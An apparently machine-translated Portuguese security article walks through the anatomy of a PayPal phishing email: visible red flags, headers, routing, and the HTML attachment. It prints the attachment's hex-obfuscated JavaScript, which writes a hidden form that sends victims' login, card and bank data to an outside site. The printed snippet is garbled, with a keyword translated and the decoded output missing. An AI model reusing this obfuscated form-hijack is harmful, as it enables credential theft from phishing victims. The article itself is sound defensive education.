Segurança on-line quebrando a anatomia de um e-mail de phishing
No mundo de hoje, onde as informações de todos estão on-line, o phishing é um dos ataques on-line mais populares e devastadores, porque você sempre pode limpar um vírus, mas se seus dados bancários forem roubados, você está com problemas. Aqui está uma análise de um desses ataques que recebemos.
Não pense que são apenas os detalhes bancários que são importantes: afinal, se alguém obtiver controle sobre o login da sua conta, ele não apenas conhecerá as informações contidas nessa conta, mas as probabilidades são de que as mesmas informações de login possam ser usadas em vários outros. contas. E se eles comprometerem sua conta de e-mail, eles poderão redefinir todas as outras senhas.
Portanto, além de manter senhas fortes e variadas, você precisa estar sempre atento a e-mails falsos disfarçados de reais. Embora a maioria das tentativas de phishing seja amadora, algumas são bastante convincentes, por isso é importante entender como reconhecê-las no nível da superfície, bem como trabalhar sob o capô..
Imagem por asirap
Examinando o que está à vista
Nosso e-mail de exemplo, como a maioria das tentativas de phishing, o "notifica" de atividade em sua conta do PayPal, o que, em circunstâncias normais, seria alarmante. Portanto, a ação é verificar / restaurar sua conta enviando praticamente todas as informações pessoais que você puder imaginar. Novamente, isso é bem estereotipado.
Embora haja exceções, praticamente todos os e-mails de phishing e scam são carregados com bandeiras vermelhas diretamente na mensagem. Mesmo que o texto seja convincente, normalmente você pode encontrar muitos erros espalhados pelo corpo da mensagem que indicam que a mensagem não é legítima..
O corpo da mensagem
À primeira vista, esse é um dos melhores e-mails de phishing que já vi. Não há erros ortográficos ou gramaticais e o palavreado é lido de acordo com o que você poderia esperar. No entanto, existem algumas bandeiras vermelhas que você pode ver quando examina o conteúdo um pouco mais de perto.
- “Paypal” - O caso correto é “PayPal” (capital P). Você pode ver as duas variações usadas na mensagem. As empresas são muito deliberadas com a sua marca, por isso é duvidoso que algo assim passasse pelo processo de revisão..
- “Allow ActiveX” - Quantas vezes você já viu um negócio legítimo na Web do tamanho do Paypal usar um componente proprietário que funciona apenas em um único navegador, especialmente quando eles suportam vários navegadores? Claro, em algum lugar lá fora, alguma empresa faz isso, mas esta é uma bandeira vermelha.
- "Com segurança". - Observe como essa palavra não se alinha na margem com o restante do texto do parágrafo. Mesmo se eu esticar a janela um pouco mais, ela não enrola ou espaço corretamente.
- "Paypal!" - O espaço antes do ponto de exclamação parece estranho. Apenas outra peculiaridade que eu tenho certeza que não estaria em um email legítimo.
- “PayPal - Formulário de atualização de conta.pdf.htm” - Por que o Paypal anexaria um “PDF” especialmente quando eles poderiam apenas vincular a uma página em seu site? Além disso, por que eles tentariam disfarçar um arquivo HTML como PDF? Esta é a maior bandeira vermelha de todos eles.
O cabeçalho da mensagem
Quando você dá uma olhada no cabeçalho da mensagem, aparecem mais algumas bandeiras vermelhas:
- O endereço do remetente é [email protected].
- O endereço para está ausente. Eu não anulei isso, simplesmente não faz parte do cabeçalho da mensagem padrão. Normalmente, uma empresa que tem seu nome personalizará o e-mail para você.
O anexo
Quando abro o anexo, você pode ver imediatamente que o layout não está correto, pois está faltando informações de estilo. Novamente, por que o PayPal enviaria por e-mail um formulário em HTML quando ele poderia simplesmente fornecer um link em seu site??
Nota: Usamos o visualizador de anexos HTML do Gmail para isso, mas recomendamos que você NÃO ABRIR anexos de golpistas. Nunca. Sempre. Eles muitas vezes contêm exploits que instalam trojans no seu PC para roubar suas informações de conta.
Rolando um pouco mais, você pode ver que este formulário solicita não apenas as informações de login do PayPal, mas também informações bancárias e de cartão de crédito. Algumas das imagens estão quebradas.
É óbvio que esta tentativa de phishing está indo atrás de tudo com um só golpe.
A divisão técnica
Embora deva ser bastante claro, com base no que está à vista que esta é uma tentativa de phishing, vamos agora quebrar a composição técnica do email e ver o que podemos encontrar.
Informações do Anexo
A primeira coisa a dar uma olhada é a fonte HTML do formulário de anexo, que é o que envia os dados para o site falso.
Ao visualizar rapidamente a fonte, todos os links parecem válidos, já que eles apontam para “paypal.com” ou “paypalobjects.com”, ambos legítimos..
Agora vamos dar uma olhada em algumas informações básicas da página que o Firefox reúne na página.
Como você pode ver, alguns dos gráficos são extraídos dos domínios “blessedtobe.com”, “goodhealthpharmacy.com” e “picuupload.de” em vez dos domínios legítimos do PayPal..
Informações dos cabeçalhos de email
Em seguida, vamos dar uma olhada nos cabeçalhos das mensagens de e-mail brutos. O Gmail torna isso disponível por meio da opção de menu Mostrar original na mensagem.
Observando as informações de cabeçalho da mensagem original, você pode ver que essa mensagem foi composta usando o Outlook Express 6. Duvido que o PayPal tenha alguém na equipe que envie cada uma dessas mensagens manualmente por meio de um cliente de e-mail desatualizado..
Agora, olhando as informações de roteamento, podemos ver o endereço IP do remetente e do servidor de e-mail de retransmissão.
O endereço IP do "Usuário" é o remetente original. Fazendo uma pesquisa rápida nas informações de IP, podemos ver que o IP de envio está na Alemanha.
E quando olhamos para o servidor de correio de retransmissão (mail.itak.at), endereço IP, podemos ver que este é um ISP baseado na Áustria. Eu duvido que o PayPal direcione seus e-mails diretamente através de um ISP com base na Áustria, quando eles têm um farm de servidores massivo que poderia facilmente lidar com essa tarefa..
Onde os dados vão?
Por isso, determinamos claramente que esse é um e-mail de phishing e coletamos algumas informações sobre o local de origem da mensagem, mas para onde seus dados são enviados?
Para ver isso, primeiro temos que salvar o anexo HTM da nossa área de trabalho e abrir em um editor de texto. Percorrendo-o, tudo parece estar em ordem, exceto quando chegamos a um bloco Javascript com aparência suspeita.
Quebrando a fonte completa do último bloco de Javascript, vemos:
// Copyright © 2005 Voormedia - WWW.VOORMEDIA.COM
var i, y, x =”3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e”; y =”; para (i = 0; i
Toda vez que você vê uma grande quantidade confusa de letras e números aparentemente aleatórios incorporados em um bloco Javascript, geralmente é algo suspeito. Olhando para o código, a variável “x” é ajustada para esta grande string e então decodificada na variável “y”. O resultado final da variável "y" é então gravado no documento como HTML.
Como a string grande é composta de números de 0 a 9 e as letras a-f, é mais provável que ela seja codificada por meio de uma simples conversão de ASCII para hexadecimal:
3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e
Traduz para:
Não é uma coincidência que isso decida em uma tag de formulário HTML válida que envie os resultados não para o PayPal, mas para um site não autorizado..
Além disso, quando você visualizar o código-fonte HTML do formulário, verá que essa tag de formulário não está visível porque é gerada dinamicamente por meio do Javascript. Essa é uma maneira inteligente de ocultar o que o HTML está realmente fazendo se alguém visualizasse simplesmente a origem gerada do anexo (como fizemos anteriormente), em vez de abrir o anexo diretamente em um editor de texto..
Executando um whois rápido no site ofensivo, podemos ver este é um domínio hospedado em um host popular, 1and1.
O que se destaca é que o domínio usa um nome legível (em oposição a algo como “dfh3sjhskjhw.net”) e o domínio está registrado há 4 anos. Por causa disso, acredito que esse domínio foi sequestrado e usado como peão nessa tentativa de phishing.
O cinismo é uma boa defesa
Quando se trata de ficar seguro online, nunca é demais ter um pouco de cinismo.
Embora eu tenha certeza de que há mais sinais vermelhos no e-mail de exemplo, o que apontamos acima são indicadores que observamos após alguns minutos de exame. Hipoteticamente, se o nível de superfície do e-mail imitava sua contraparte legítima em 100%, a análise técnica ainda revelaria sua verdadeira natureza. É por isso que é importante poder examinar o que você pode e não pode ver.